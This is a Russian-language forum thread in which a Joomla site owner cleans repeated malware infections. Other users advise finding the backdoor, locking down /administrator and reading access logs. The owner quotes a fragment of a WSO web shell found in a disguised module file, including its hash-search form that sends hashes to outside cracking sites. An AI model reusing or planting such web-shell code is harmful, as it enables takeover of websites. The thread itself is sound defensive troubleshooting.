Вашем аккаунте опять было обнаружено вредоносное содержимое - Безопасность сайтов на Joomla

Доброе время суток
 столкнулся с данной проблемой

письмо от хостера

Обращаем Ваше внимание на то, что на Вашем аккаунте опять было обнаружено
вредоносное содержимое.

Примеры вредоносных скриптов:

/administrator/index.1.php
/administrator/index.bak.php
/administrator/index.class.php
/administrator/index.inc.php


Убедительная просьба в кратчайшие сроки проверить аккаунт на наличие
вредоносного содержимого и внимательно следить за работой своего аккаунта.
В случае повторения ситуации, работа аккаунта будет приостановлена.

я их удалил
но все повторилось

причем в папке administrator/

создаются очень много файлов
во такого названия

   
lock41f6601ff986f6d7126ac8e41e57885a
21 B   -rw-r--r--   
   
res0edfd385c41fca147c559328d544ce4a
8.59 KB   -rw-r--r--   
   
res41f6601ff986f6d7126ac8e41e57885a
1.03 KB   -rw-r--r--   

если кто сталкивался подскажите буду признателен материально

Вы удаляете файлы, а нужно еще удалить шелл, бекдор, с помощью которого заливаются эти левые файлы.
Сканеры и инструменты защиты Joomla, в разделе Безопасность.

сканировал по удалял
а они как грибы

поудалял пишется слитно.

Нужно не симптомы лечить, а болезнь. В вашем случае надо найти шелл, бэкдор ... вам выше написали

не подскажите чем?
AD Search&Replace чтото не чего не дал

http://revisium.com/ai/

Попробуйте

не подскажите чем?

Подсказать-то можно, только без обид. Удалять нужно головой.
Всё остальное - инструменты, которые могут быть разными или не быть вовсе.
Универсального рецепта, гарантирующего успех, и пошаговой инструкции "что" и "как" делать - нет и быть не может в принципе.
Это вам не Касперский, тут думать надо (с) wishlight

Для начала поставь на директорию /administrator Basic-пароль и включи запись логов доступа (http, ftp), если не включена.
Потом убей вражеские файлы и начинай читать логи. Если не понимаешь, что в логах искать - ищи человека, который понимает.
Любые "искалки" - полумера, никаких гарантий не дающая. Правильно настроенная голова даст им всем фору.
Но правильная настройка головы "с нуля" занимает годы. Поэтому реши, нужно ли это тебе, или лучше поручить кому-то.

Вы сможете это сделать?

NHL09, ответ в личных сообщениях.

сканировал по удалял а они как грибы

Так закрой админку, создав файл .htaccess  и положи в /administrator. А  будет нужно войти в админку, просто закоментируешь две строки.

походу нашел
modules\mod_articles/mod_articles.php01
имено имя было фала mod_articles.php01
его содержимое

if(@$_POST['p3'])
      wsoRecursiveGlob($_POST['c']);
   echo "</div><br><h1>Search for hash:</h1><div class=content>
      <form method='post' target='_blank' name='hf'>
         <input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
         <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
         <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
      </form></div>";
   wsoFooter();
}


но как он мог ко мне попасть?

думается что это еще не все найденое

да вы правы не все
опять файлы лезут

все вроде победил
много файлов было с окончанием
.1.php
.class.php
.bak.php
.inc.php

в папках  \cli
\includes
\libraries
и д.р.
  удалил все в папках и заменил из чистой Joomla